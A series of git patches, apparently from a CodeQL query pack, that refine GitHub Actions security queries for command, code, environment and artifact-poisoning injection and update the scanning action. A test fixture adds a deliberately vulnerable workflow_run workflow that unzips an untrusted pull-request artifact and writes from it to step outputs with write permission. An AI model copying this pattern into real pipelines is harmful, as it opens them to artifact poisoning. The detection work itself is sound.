} Strategy getStrategy() { result = super.getStrategy() } + + predicate isPrivileged() { super.isPrivileged() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index dff5f351a69..7cc70c86d20 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,6 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.dataflow.ExternalFlow /** * Gets the length of each line in the StringValue . @@ -332,8 +333,40 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 + } + /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The Workflow accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The Workflow is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, WorkflowImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.isPrivileged() + ) + or + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { @@ -597,6 +630,36 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The job has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The job accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The effective permissions have write access + exists(string path, string name, string secrets_source, string perms | + workflowDataModel(path, _, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") and + ( + secrets_source.trim().toLowerCase() = "actions" or + perms.toLowerCase().matches("%write%") + ) + ) + or + // The job has no expliclit permission, but the enclosing workflow is privileged + not exists(this.getPermissions()) and + not exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) and + // The enclosing workflow is privileged + this.getEnclosingWorkflow().isPrivileged() + } } class LocalJobImpl extends JobImpl { diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index cc7e4c633e3..5db10e7823e 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,6 +2,13 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +) { + Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 8e8ce10bba9..529f7721e71 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,3 +22,8 @@ extensible predicate summaryModel( extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); + +extensible predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml new file mode 100644 index 00000000000..f9f983be693 --- /dev/null +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -0,0 +1,5 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 94df84766b5..d4b4ca8fdeb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -15,3 +15,4 @@ groups: dataExtensions: - ext/*.model.yml - ext/**/*.model.yml + - ext/workflow-models/workflow-models.yml diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 19b4cf6c01b..720b7aed8cc 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -20,11 +20,11 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2fca3b32494..af3f2998cc9 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -20,11 +20,11 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index e9f55d1cbb2..3e7c74ab895 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -19,9 +19,9 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 1a32183bfb2..aac7568e654 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -19,9 +19,9 @@ import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index de60141bb40..6ac15f83207 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -20,11 +20,11 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index bbfb226ecd1..adb8f25f077 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -19,9 +19,9 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index dc28cc2569f..aa5bbfdf75a 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -22,11 +22,11 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 9814df091dd..d043bd930b6 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -21,9 +21,9 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 19b007902bd..c26862960d1 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -19,11 +19,11 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin where ArtifactPoisoningFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql index cd6d5eeb108..379babf35f8 100644 --- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql @@ -18,9 +18,9 @@ import ArtifactPoisoningFlow::PathGraph from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", diff --git a/ql/test/library-tests/workflowenum.expected b/ql/test/library-tests/workflowenum.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql new file mode 100644 index 00000000000..692d1eb706b --- /dev/null +++ b/ql/test/library-tests/workflowenum.ql @@ -0,0 +1,8 @@ +import actions +import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions + +from + string path, string visibility, string job, string secrets_source, string permissions, + string runner +where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +select visibility, path, job, secrets_source, permissions, runner diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual rename to ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml new file mode 100644 index 00000000000..dcc80c6e74f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml @@ -0,0 +1,53 @@ +name: Dependency Tree Reporter +on: + workflow_run: + workflows: [ "Dependency Tree Input Builder" ] + types: + - completed + +permissions: {} + +jobs: + compare: + permissions: + actions: read + pull-requests: write + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: Download artifacts + uses: actions/github-script@v7.0.1 + with: + script: | + var artifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + console.log(artifacts); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "input-artifacts" + })[0]; + var download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/input.zip', Buffer.from(download.data)); + - name: Set needed env vars in outputs + id: prepare + run: | + unzip input.zip + echo current directory contents + ls -al + + echo Reading PR number + tmp=$(> $GITHUB_OUTPUT + + - run: echo ${{ steps.prepare.outputs.pr }} From 17933cbb549184b3d4e8652104513ef3b1f3f20c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:30:22 +0200 Subject: [PATCH 0212/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d4b4ca8fdeb..00b31b33bf5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.15 +version: 0.0.16 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 60e21004b84..dc9c140e60f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.15 +version: 0.0.16 groups: - actions - queries From f73571a7524193b3be87e65c72815f94490ef445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 11:20:52 +0200 Subject: [PATCH 0213/1267] fix: fix shell comments --- action.yml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index 42141a1dd74..9580cff83e8 100644 --- a/action.yml +++ b/action.yml @@ -29,16 +29,25 @@ runs: shell: bash if: inputs.workflow-models run: | - // Create QLPack directory + # Create QLPack directory mkdir workflow-extpack cd workflow-extpack - // Store the extension pack file - cat > models.yml << 'EOF' + # Store the extension pack file + cat > models.json << 'EOF' ${{ inputs.workflow-models }} EOF - // Create QLPack + # Store the extension pack file + cat > models.yml << 'EOF' + extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] + EOF + + # Create QLPack cat > qlpack.yml << 'EOF' name: local/workflow-models library: true @@ -48,7 +57,7 @@ runs: - models.yml EOF - // Set env vars + # Set env vars echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV From a2ed07ec3525a4fc032f0d17a3ab9ed093bb01aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 12:43:23 +0200 Subject: [PATCH 0214/1267] Update scan action --- .github/action/dist/index.js | 11 ++++++++++- .github/action/package-lock.json | 14 +++++++------- .github/action/package.json | 2 +- .github/action/src/codeql.ts | 7 ++++++- action.yml | 15 +++------------ 5 files changed, 27 insertions(+), 22 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 4c98f1d6301..6f4a57b10fb 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), @@ -28706,6 +28706,15 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "") { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json index eef94f4b5cd..9cacb7f9af9 100644 --- a/.github/action/package-lock.json +++ b/.github/action/package-lock.json @@ -15,7 +15,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" @@ -195,9 +195,9 @@ } }, "node_modules/@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "dependencies": { "undici-types": "~5.26.4" @@ -520,9 +520,9 @@ } }, "@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "requires": { "undici-types": "~5.26.4" diff --git a/.github/action/package.json b/.github/action/package.json index 90512a3163c..cd9021d20c5 100644 --- a/.github/action/package.json +++ b/.github/action/package.json @@ -40,7 +40,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index e845ec9fd4f..b318cb1b3e2 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -149,7 +149,12 @@ export async function codeqlDatabaseAnalyze( const extPackPath = process.env["EXTPACK_PATH"]; const extPackName = process.env["EXTPACK_NAME"]; - if (extPackPath !== undefined && extPackName !== undefined) { + if ( + extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "" + ) { cmd.push("--additional-packs", extPackPath); cmd.push("--extension-packs", extPackName); } diff --git a/action.yml b/action.yml index 9580cff83e8..addc5588b8d 100644 --- a/action.yml +++ b/action.yml @@ -33,18 +33,9 @@ runs: mkdir workflow-extpack cd workflow-extpack - # Store the extension pack file - cat > models.json << 'EOF' - ${{ inputs.workflow-models }} - EOF - # Store the extension pack file cat > models.yml << 'EOF' - extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: workflowDataModel - data: [] + ${{ inputs.workflow-models }} EOF # Create QLPack @@ -69,7 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ inputs.extpack-path }} - EXTPACK_NAME: ${{ inputs.extpack-name }} + EXTPACK_PATH: ${{ env.EXTPACK_PATH }} + EXTPACK_NAME: ${{ env.EXTPACK_NAME }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 858df49012e2583ce58303cb74404ca9744aa2f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:08:27 +0200 Subject: [PATCH 0215/1267] Generate yaml file --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- action.yml | 10 ++++++++++ 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 6f4a57b10fb..4a60299ef0f 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b318cb1b3e2..842af1c8b17 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/action.yml b/action.yml index addc5588b8d..a9f9b2ad6cb 100644 --- a/action.yml +++ b/action.yml @@ -52,6 +52,16 @@ runs: echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + - name: Show contents + shell: bash + run: | + echo "Directory contents" + ls -la + echo "Models" + if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + echo "QLPack" + if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + - name: Scan workflows shell: bash env: From 5cd8d70a9cfe2eb5521fd932585bf660c044ed53 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:09:06 +0200 Subject: [PATCH 0216/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00b31b33bf5..f6efd7fa0f1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.16 +version: 0.0.17 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dc9c140e60f..9e8fdef850a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.16 +version: 0.0.17 groups: - actions - queries From 6237a8e24cd2bda5c27d4293c4a15f3af2764ed6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:27:44 +0200 Subject: [PATCH 0217/1267] Update action.yml --- action.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index a9f9b2ad6cb..4b99389767c 100644 --- a/action.yml +++ b/action.yml @@ -28,15 +28,15 @@ runs: - name: Process workflow models shell: bash if: inputs.workflow-models + env: + DATA: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - cat > models.yml << 'EOF' - ${{ inputs.workflow-models }} - EOF + echo $DATA > models.yml # Create QLPack cat > qlpack.yml << 'EOF' @@ -55,8 +55,6 @@ runs: - name: Show contents shell: bash run: | - echo "Directory contents" - ls -la echo "Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi echo "QLPack" From 16cf60af008300fea37973242fa894d7668809b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:05:40 +0200 Subject: [PATCH 0218/1267] Add double quotes to env var --- action.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index 4b99389767c..ca9a5446434 100644 --- a/action.yml +++ b/action.yml @@ -29,14 +29,14 @@ runs: shell: bash if: inputs.workflow-models env: - DATA: ${{ inputs.workflow-models }} + MODELS: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - echo $DATA > models.yml + echo "$MODELS" > models.yml # Create QLPack cat > qlpack.yml << 'EOF' From 944bd84a58f61450f368bd6d035ce523b54c9629 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:15:16 +0200 Subject: [PATCH 0219/1267] Add missing spaces --- action.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index ca9a5446434..010e28c6a28 100644 --- a/action.yml +++ b/action.yml @@ -55,10 +55,12 @@ runs: - name: Show contents shell: bash run: | - echo "Models" + echo "##[group] Workflow Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi - echo "QLPack" + echo "##[endgroup]" + echo "##[group] QLPack" if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + echo "##[endgroup]" - name: Scan workflows shell: bash From c9b2dac128f9c885305f79867c7b8a41babc095e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 15:07:05 +0200 Subject: [PATCH 0220/1267] Update action.yml --- action.yml | 49 ++++++++++++------------------------------------- 1 file changed, 12 insertions(+), 37 deletions(-) diff --git a/action.yml b/action.yml index 010e28c6a28..6a1285de0de 100644 --- a/action.yml +++ b/action.yml @@ -5,61 +5,36 @@ inputs: token: description: GitHub Token default: ${{ github.token }} - source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." default: ${{ github.workspace }} - sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" - suite: description: "CodeQL Suite to run" default: "actions-code-scanning" - - workflow-models: - description: "Workflow models" + workflow-extpack-path: + description: "Path to Workflow extpack" + required: false + workflow-extpack-name: + description: "Name of the Workflow extpack" required: false runs: using: 'composite' steps: - - name: Process workflow models + - name: extpack contents shell: bash - if: inputs.workflow-models env: - MODELS: ${{ inputs.workflow-models }} - run: | - # Create QLPack directory - mkdir workflow-extpack - cd workflow-extpack - - # Store the extension pack file - echo "$MODELS" > models.yml - - # Create QLPack - cat > qlpack.yml << 'EOF' - name: local/workflow-models - library: true - extensionTargets: - githubsecuritylab/actions-all: '*' - dataExtensions: - - models.yml - EOF - - # Set env vars - echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV - echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV - - - name: Show contents - shell: bash + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" - if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + if [ -f $EXTPACK_PATH/models.yml ]; then cat 